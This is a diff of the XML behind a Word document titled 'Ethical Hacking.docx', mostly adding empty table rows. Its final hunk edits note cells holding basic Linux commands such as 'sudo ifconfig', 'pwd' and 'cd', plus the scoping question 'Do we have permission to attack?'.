+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
           <w:p/>
         </w:tc>
         <w:tc>

--- a/Ethical Hacking.docx
+++ b/Ethical Hacking.docx
@@ -90,7 +90,6 @@
                 <w:color w:val="FF0000"/>
               </w:rPr>
             </w:pPr>
-            <w:proofErr w:type="gramStart"/>
             <w:r>
               <w:rPr>
                 <w:color w:val="FF0000"/>
@@ -101,14 +100,7 @@
               <w:rPr>
                 <w:color w:val="FF0000"/>
               </w:rPr>
-              <w:t>(</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="FF0000"/>
-              </w:rPr>
-              <w:t xml:space="preserve">open port 80, </w:t>
+              <w:t xml:space="preserve">(open port 80, </w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -236,21 +228,105 @@
             <w:tcW w:w="4631" w:type="dxa"/>
           </w:tcPr>
           <w:p>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>sudo</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t>sudo ifconfig</w:t>
+            </w:r>
+          </w:p>
+          <w:p/>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4945" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:t>1. Do we have permission to attack?</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4631" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:t>pwd – current directory</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4945" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4631" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:t>cd - directory</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4945" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4631" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:t>M</w:t>
